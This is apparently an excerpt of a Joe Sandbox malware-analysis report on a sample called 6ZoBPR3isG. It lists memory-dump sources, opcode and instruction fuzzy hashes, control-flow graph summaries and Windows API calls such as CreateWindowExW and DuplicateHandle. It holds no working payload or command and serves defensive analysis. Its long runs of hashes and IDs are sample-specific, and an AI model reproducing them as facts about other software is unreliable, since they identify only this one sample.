                                                                                                              • Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cba803625b74cda9f152ebeef80fb834a1c3661e5bb0bc62c24b36a74b1a1731
                                                                                                              • Instruction ID: d1e36b9675e2f4c766c0f07218cdbee915150a2774263d83d5a0d07e8d88ff66
                                                                                                              • Opcode Fuzzy Hash: cba803625b74cda9f152ebeef80fb834a1c3661e5bb0bc62c24b36a74b1a1731
                                                                                                              • Instruction Fuzzy Hash: 5061C574E002088FEB18DFAAD854A9DFBF2BF89300F14C169E819AB365DB745942DF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bb54571c08e047ae3d4bdef91383613f6a181eaf6b3b76a62c4a15b7c9f63fc9
                                                                                                              • Instruction ID: 4d7fe12bdde5517b4c15e6917b196b9e3ad14693b74028e036af8b7dc05ef805
                                                                                                              • Opcode Fuzzy Hash: bb54571c08e047ae3d4bdef91383613f6a181eaf6b3b76a62c4a15b7c9f63fc9
                                                                                                              • Instruction Fuzzy Hash: 2D611A74A4021ACFEB25DF60D954BADB7B2FB88300F1080A9D909777A1DE319E92DF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e6b8a09cb98c7d5fc0da896f64cf5fc1105082d524441feaf52c65c7603ce30e
                                                                                                              • Instruction ID: 032917ec3af9c5eb52d17a59d0d0cde53ceee37d58dd27306d5f0f495efae918
                                                                                                              • Opcode Fuzzy Hash: e6b8a09cb98c7d5fc0da896f64cf5fc1105082d524441feaf52c65c7603ce30e
                                                                                                              • Instruction Fuzzy Hash: 78611974A04258CFEB25DF60D954BADB7B2FB88300F1085AAD91A77394DB319E92DF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8393577fddb7b4fd5e72a95822eedc73558348e9ac9d7ff27065c2d02d916590
                                                                                                              • Instruction ID: a4d65789ce125257b71a244b2b9c90c83882e9c4ed311ac0598cfb2700926ef2
                                                                                                              • Opcode Fuzzy Hash: 8393577fddb7b4fd5e72a95822eedc73558348e9ac9d7ff27065c2d02d916590
                                                                                                              • Instruction Fuzzy Hash: 7341E374E00208CBEB18EFA6D95469EFBF2EF89304F20D129C815BB254DB35594ACF44

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 371FDE5E
                                                                                                              • GetCurrentThread.KERNEL32 ref: 371FDE9B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 371FDED8
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 371FDF31
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID: Z/Kq
                                                                                                              • API String ID: 2063062207-2188043875
                                                                                                              • Opcode ID: 628709290cde5e4ccd6c7e4de44f09c8bd6f75533a7abf54759a26db3dfc0ef6
                                                                                                              • Instruction ID: 115dfd92b6519b6b684b2eedb07ea3bc9367c052eaa14dc03d40e3a86fef2300
                                                                                                              • Opcode Fuzzy Hash: 628709290cde5e4ccd6c7e4de44f09c8bd6f75533a7abf54759a26db3dfc0ef6
                                                                                                              • Instruction Fuzzy Hash: 985185B09007498FDB14CFA9C558BEEBBF1AF88300F208559D459B73A1CB75A941CF65

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 371FDE5E
                                                                                                              • GetCurrentThread.KERNEL32 ref: 371FDE9B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 371FDED8
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 371FDF31
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID: Z/Kq
                                                                                                              • API String ID: 2063062207-2188043875
                                                                                                              • Opcode ID: 268b0fa3b51c439e333988baa946e559f90cd8b729e516d329af8112e83cd52b
                                                                                                              • Instruction ID: 225078cb7dcc2d1c6fbd4e4edafd1a9ee3a43bb164497564e5dba846999483c4
                                                                                                              • Opcode Fuzzy Hash: 268b0fa3b51c439e333988baa946e559f90cd8b729e516d329af8112e83cd52b
                                                                                                              • Instruction Fuzzy Hash: BE5164B09007098FDB14CFAAC558BEEBBF1AF88300F208559E459B73A1DB75A941CF65

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 44 371fd510-371fd518 45 371fd55d-371fd5d6 44->45 46 371fd51a-371fd550 call 371fb85c 44->46 48 371fd5d8-371fd5de 45->48 49 371fd5e1-371fd5e8 45->49 50 371fd555-371fd556 46->50 48->49 51 371fd5ea-371fd5f0 49->51 52 371fd5f3-371fd692 CreateWindowExW 49->52 51->52 54 371fd69b-371fd6d3 52->54 55 371fd694-371fd69a 52->55 59 371fd6d5-371fd6d8 54->59 60 371fd6e0 54->60 55->54 59->60 61 371fd6e1 60->61 61->61
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 371FD682
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID: Z/Kq$Z/Kq
                                                                                                              • API String ID: 716092398-809427168
                                                                                                              • Opcode ID: fdc1dbb322a9df52ce781b79da9e30b0837ddd82da3265cb4780fccda7065555
                                                                                                              • Instruction ID: 8e994e3110be2c503287382cdfa693ba9be35b6c67adb82c88b0be24133e48e0
                                                                                                              • Opcode Fuzzy Hash: fdc1dbb322a9df52ce781b79da9e30b0837ddd82da3265cb4780fccda7065555
                                                                                                              • Instruction Fuzzy Hash: 825103B6C00249EFDF02CF95C990ADEBFB1BF49310F24826AE818AB221D7319851CF51

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 62 371fd564-371fd5d6 63 371fd5d8-371fd5de 62->63 64 371fd5e1-371fd5e8 62->64 63->64 65 371fd5ea-371fd5f0 64->65 66 371fd5f3-371fd62b 64->66 65->66 67 371fd633-371fd692 CreateWindowExW 66->67 68 371fd69b-371fd6d3 67->68 69 371fd694-371fd69a 67->69 73 371fd6d5-371fd6d8 68->73 74 371fd6e0 68->74 69->68 73->74 75 371fd6e1 74->75 75->75
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 371FD682
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID: Z/Kq$Z/Kq
                                                                                                              • API String ID: 716092398-809427168
                                                                                                              • Opcode ID: 0845f49cc1ef32f372acd84cc1ec71baf2bbb652dd340f9b683529d499c2b828
                                                                                                              • Instruction ID: f03963c7b94c09e7df40c5c16ab1c1d9d579fc11336b589bf38447a2dfdde17c
                                                                                                              • Opcode Fuzzy Hash: 0845f49cc1ef32f372acd84cc1ec71baf2bbb652dd340f9b683529d499c2b828
                                                                                                              • Instruction Fuzzy Hash: 8751DFB5D00709DFDF15CF9AC990ADEBBB1BF48310F20822AE819AB250D775A841CF90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 76 371fd570-371fd5d6 77 371fd5d8-371fd5de 76->77 78 371fd5e1-371fd5e8 76->78 77->78 79 371fd5ea-371fd5f0 78->79 80 371fd5f3-371fd62b 78->80 79->80 81 371fd633-371fd692 CreateWindowExW 80->81 82 371fd69b-371fd6d3 81->82 83 371fd694-371fd69a 81->83 87 371fd6d5-371fd6d8 82->87 88 371fd6e0 82->88 83->82 87->88 89 371fd6e1 88->89 89->89
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 371FD682
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID: Z/Kq$Z/Kq
                                                                                                              • API String ID: 716092398-809427168
                                                                                                              • Opcode ID: 3413fe948e8a9a8beed07fef2f6a8323e567c66d1dc3bc81dca04683e25f70c3
                                                                                                              • Instruction ID: 43521ec2916d8011ede1117a66464a1336a1e519c2240ec8d87609fbbc7902b4
                                                                                                              • Opcode Fuzzy Hash: 3413fe948e8a9a8beed07fef2f6a8323e567c66d1dc3bc81dca04683e25f70c3
                                                                                                              • Instruction Fuzzy Hash: F241CEB5D00749DFDF14CF9AC990ADEBBB5BF48310F20822AE819AB250D775A841CF90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 828 160ec8-160eed 829 160ef4-160f4b 828->829 830 160eef 828->830 835 160f4d-160f55 call 1607d4 829->835 836 160f5a-160f92 829->836 830->829 835->836 841 160f94-160f9c call 1607e4 836->841 842 160fa1-160fb1 836->842 841->842
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @G$@G$@G
                                                                                                              • API String ID: 0-897220753
                                                                                                              • Opcode ID: 18413db11f76b0c54dc7931cb094c29926fea8f22d8ca1bdcfbde5e9f7d24de8
                                                                                                              • Instruction ID: 6a27a382dadae29edb97e1eb2bf01811a62c01eaf909b794fdb2a5ac8c4e15a3
                                                                                                              • Opcode Fuzzy Hash: 18413db11f76b0c54dc7931cb094c29926fea8f22d8ca1bdcfbde5e9f7d24de8
                                                                                                              • Instruction Fuzzy Hash: 2B217F74E04248AFDB0AEFB9C9516BEB7B2FF8A304F0084A9D4049B395DB745A51CF51

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 847 371fe484-371ff26c 850 371ff31c-371ff33c call 371fb884 847->850 851 371ff272-371ff277 847->851 859 371ff33f-371ff34c 850->859 853 371ff2ca-371ff302 CallWindowProcW 851->853 854 371ff279-371ff2b0 851->854 855 371ff30b-371ff31a 853->855 856 371ff304-371ff30a 853->856 862 371ff2b9-371ff2c8 854->862 863 371ff2b2-371ff2b8 854->863 855->859 856->855 862->859 863->862
                                                                                                              APIs
                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 371FF2F1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallProcWindow
                                                                                                              • String ID: Z/Kq
                                                                                                              • API String ID: 2714655100-2188043875
                                                                                                              • Opcode ID: a6daf4584ab944a85fa306343d2e993303634f159fb455f8edba34f31814de78
                                                                                                              • Instruction ID: a49b9b3f21aa1921bec5eb9f68d731f92754a98c017cc1ce836d1a6d23c8c16f
                                                                                                              • Opcode Fuzzy Hash: a6daf4584ab944a85fa306343d2e993303634f159fb455f8edba34f31814de78
                                                                                                              • Instruction Fuzzy Hash: 1A4125B9900309DFDB14CF95C884BAABBF9FB89314F248559D518AB321C775A842CBA0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 865 371fe020-371fe0bc DuplicateHandle 866 371fe0be-371fe0c4 865->866 867 371fe0c5-371fe0e2 865->867 866->867
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 371FE0AF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID: Z/Kq
                                                                                                              • API String ID: 3793708945-2188043875
                                                                                                              • Opcode ID: 68848c1e8809de6434a1f10c5a95e89de8c36816be4d828bc167a7e8d815c31a
                                                                                                              • Instruction ID: e5b8efd26eff798d192f9cab2a81b1bd2ce2189b4e38d6a857455643e2e45620
                                                                                                              • Opcode Fuzzy Hash: 68848c1e8809de6434a1f10c5a95e89de8c36816be4d828bc167a7e8d815c31a
                                                                                                              • Instruction Fuzzy Hash: 4F2114B59002099FDB10CFAAD984ADEBBF4EB48310F14851AE918B7350D378A955CF65

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 870 371fe028-371fe0bc DuplicateHandle 871 371fe0be-371fe0c4 870->871 872 371fe0c5-371fe0e2 870->872 871->872
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 371FE0AF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID: Z/Kq
                                                                                                              • API String ID: 3793708945-2188043875
                                                                                                              • Opcode ID: d20643cfab0073d6fc1a55945014d882bb92c28213c0632b8ab1b8e65143b666
                                                                                                              • Instruction ID: 271faa43442d128e7fe54192284bbd47d380e49b3b0dbcb185d7fe04fe4666cc
                                                                                                              • Opcode Fuzzy Hash: d20643cfab0073d6fc1a55945014d882bb92c28213c0632b8ab1b8e65143b666
                                                                                                              • Instruction Fuzzy Hash: 4721F5B59002499FDB10CFAAD484ADEFBF4FB48310F14841AE918A3350D379A954CFA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 886 3775bfa0-3775bfa5 887 3775bfa8-3775c012 DispatchMessageW 886->887 888 3775c014-3775c01a 887->888 889 3775c01b-3775c02f 887->889 888->889
                                                                                                              APIs
                                                                                                              • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3775B1CF), ref: 3775C005
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DispatchMessage
                                                                                                              • String ID: Z/Kq
                                                                                                              • API String ID: 2061451462-2188043875
                                                                                                              • Opcode ID: 3e19f0bbb3afe7e7445e1f2b0b54313e2600e238f01da1a6b7b296a48ef9d12a
                                                                                                              • Instruction ID: 9d4a5ed1facd500d407fc0466dbc091217fce0806e30f6cda8936046a3a9ce48
                                                                                                              • Opcode Fuzzy Hash: 3e19f0bbb3afe7e7445e1f2b0b54313e2600e238f01da1a6b7b296a48ef9d12a
                                                                                                              • Instruction Fuzzy Hash: 491110B4C002498FDB20CF9AD844BDEFBF4EB48320F10852AE428A7650D378A544CFA5
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,00186428,?,?), ref: 371FF4ED
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Timer
                                                                                                              • String ID: Z/Kq
                                                                                                              • API String ID: 2870079774-2188043875
                                                                                                              • Opcode ID: a3b04dfd31e5ce5093d6ac489981e1424acc59bcf72c18e5be8574363176430e
                                                                                                              • Instruction ID: e7e3a65fac614567d2bd31aca9c63f1c98e070a9e78e1cfe5488d643244cee68
                                                                                                              • Opcode Fuzzy Hash: a3b04dfd31e5ce5093d6ac489981e1424acc59bcf72c18e5be8574363176430e
                                                                                                              • Instruction Fuzzy Hash: 6711D3B5800249DFDB20CF9AD444BDEBFF8EB48320F20895AE558A7350D375AA44CFA5
                                                                                                              APIs
                                                                                                              • OleInitialize.OLE32(00000000), ref: 3775ACE5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Initialize
                                                                                                              • String ID: Z/Kq
                                                                                                              • API String ID: 2538663250-2188043875
                                                                                                              • Opcode ID: e18817c637666c76319a077d51f2a160b1909a7c5699be950728e0280d9f827f
                                                                                                              • Instruction ID: 24fdac94bf8e878913282afa7e124e7b9a712f5cd06da07ea98b1d3913ce6c0a
                                                                                                              • Opcode Fuzzy Hash: e18817c637666c76319a077d51f2a160b1909a7c5699be950728e0280d9f827f
                                                                                                              • Instruction Fuzzy Hash: BE1115B58003498FDB10CF9AD584BDEBFF4EB48320F20886AD558A7710D378A541CFA5
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,00186428,?,?), ref: 371FF4ED
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Timer
                                                                                                              • String ID: Z/Kq
                                                                                                              • API String ID: 2870079774-2188043875
                                                                                                              • Opcode ID: c5a6bec2edfe53bb5549f9d80cabe86b9e6d3bacf14d8afee6305de2d72c77a8
                                                                                                              • Instruction ID: c88659fb3945fc43d1c4dd0af103498150e2c6f3a69b022a431a4fd1d02486fe
                                                                                                              • Opcode Fuzzy Hash: c5a6bec2edfe53bb5549f9d80cabe86b9e6d3bacf14d8afee6305de2d72c77a8
                                                                                                              • Instruction Fuzzy Hash: 351103B5800349DFDB20DF9AD444BDEBBF8EB48320F20841AE958A7310D3B5A940CFA5
                                                                                                              APIs
                                                                                                              • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3775B1CF), ref: 3775C005
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DispatchMessage
                                                                                                              • String ID: Z/Kq
                                                                                                              • API String ID: 2061451462-2188043875
                                                                                                              • Opcode ID: 3fa33903a602698fc197ba8a34461a9e258d55bf03fefd7c42f940bb4c71042e
                                                                                                              • Instruction ID: 36de52a999f898ca60e13d1a03ab7a08193d2a90a0f51673bd48cca23cdbfac8
                                                                                                              • Opcode Fuzzy Hash: 3fa33903a602698fc197ba8a34461a9e258d55bf03fefd7c42f940bb4c71042e
                                                                                                              • Instruction Fuzzy Hash: 6811F2B5C046498FDB20CF9AD844BDEFBF4EB48324F10842AD428B7250D378A544CFA5
                                                                                                              APIs
                                                                                                              • OleInitialize.OLE32(00000000), ref: 3775ACE5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Initialize
                                                                                                              • String ID: Z/Kq
                                                                                                              • API String ID: 2538663250-2188043875
                                                                                                              • Opcode ID: 2b216c2f4a35377cda8617971a87acc8e1db987c9a6ef998213ab78581ffce5f
                                                                                                              • Instruction ID: 4eafb1dfd1437bac78117f2dda3fdf85d844eccbba83105add3444fa1f6810af
                                                                                                              • Opcode Fuzzy Hash: 2b216c2f4a35377cda8617971a87acc8e1db987c9a6ef998213ab78581ffce5f
                                                                                                              • Instruction Fuzzy Hash: 271115B59043498FDB20CF9AD584BDEBFF4EB48320F20846AD558A7710D378A941CFA5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: e61cbccb03bcf93d7ddc897b9e3651762a646e742dc7d73f50ab095f683f42ce
                                                                                                              • Instruction ID: bc3e8a18ef4bf8e3f952c5d89d9d80be808ea13db4f37828a41de97a6b6d9511
                                                                                                              • Opcode Fuzzy Hash: e61cbccb03bcf93d7ddc897b9e3651762a646e742dc7d73f50ab095f683f42ce
                                                                                                              • Instruction Fuzzy Hash: 22227A30600605CFCB25CF68C894AAEB7F5FF89300F54452AE45AE7651DB34E9A2CF92
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: f01a69c3ce478bcb97b37de92a7ba4054ab872391a5239000b0382060b28db07
                                                                                                              • Instruction ID: bda86f600b236748270f2092fb2e40cae231d8edd2fb9977ba7d21c9c5b688e0
                                                                                                              • Opcode Fuzzy Hash: f01a69c3ce478bcb97b37de92a7ba4054ab872391a5239000b0382060b28db07
                                                                                                              • Instruction Fuzzy Hash: 45A1F738B043149FEB05AF74C86865D77A2EFC63A0B20426AE925DB3D1DF358D45CB92
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 3
                                                                                                              • API String ID: 0-1842515611
                                                                                                              • Opcode ID: 18f55a735cf9cbbf84b254d578975a25aee940d6e63e3b1f3e2f8f81524aa491
                                                                                                              • Instruction ID: 8aeb69bb357a2fa1d4cb92a6b8ed71108e8b602ecc5e3a2199aab6e5f458c5a2
                                                                                                              • Opcode Fuzzy Hash: 18f55a735cf9cbbf84b254d578975a25aee940d6e63e3b1f3e2f8f81524aa491
                                                                                                              • Instruction Fuzzy Hash: 8B71C274E00218CFDB18DFA9D894A9DFBF2BF49300F148169E819AB361DB709985DF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @6U
                                                                                                              • API String ID: 0-3386423480
                                                                                                              • Opcode ID: 743468afabc81b0b561814c2dc1f15b92fff50ccb97fe83a39c0b925f5c41909
                                                                                                              • Instruction ID: dff228d3025e6fb9628d1dff5d17511fbb28e77448343ec273ec95a187831a56
                                                                                                              • Opcode Fuzzy Hash: 743468afabc81b0b561814c2dc1f15b92fff50ccb97fe83a39c0b925f5c41909
                                                                                                              • Instruction Fuzzy Hash: 2F31B231B002049FDB05EBB99D55A6EBBF6EFC9241B208079E90ADB351DE318E02D791
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 760T
                                                                                                              • API String ID: 0-3743294776
                                                                                                              • Opcode ID: 24551afce725187f01024c94a8952acd689f79d607387a41464e1be726b8dc86
                                                                                                              • Instruction ID: 8c16d898ef58b3d6b116b81538275b7a130d37390277f3a150503afe025baf79
                                                                                                              • Opcode Fuzzy Hash: 24551afce725187f01024c94a8952acd689f79d607387a41464e1be726b8dc86
                                                                                                              • Instruction Fuzzy Hash: 72F0F0353041047FDB11566A9C58AAABBAAAFC5721F60802AF509CB381CAB28D02CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a1f38151a2682a3ede427eaad2daadd15f2405c411470ab1ede396b66f0d3ac3
                                                                                                              • Instruction ID: 516b1c6b3fbb74f5949a4021d67e98c9d56f67cc6cd2b1948995e8205b6f40cf
                                                                                                              • Opcode Fuzzy Hash: a1f38151a2682a3ede427eaad2daadd15f2405c411470ab1ede396b66f0d3ac3
                                                                                                              • Instruction Fuzzy Hash: 31620C2961D3D29FD7224F305CFB9D5BFA09E0714476D0ACEE0C1664A3DA9A87A9C313
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
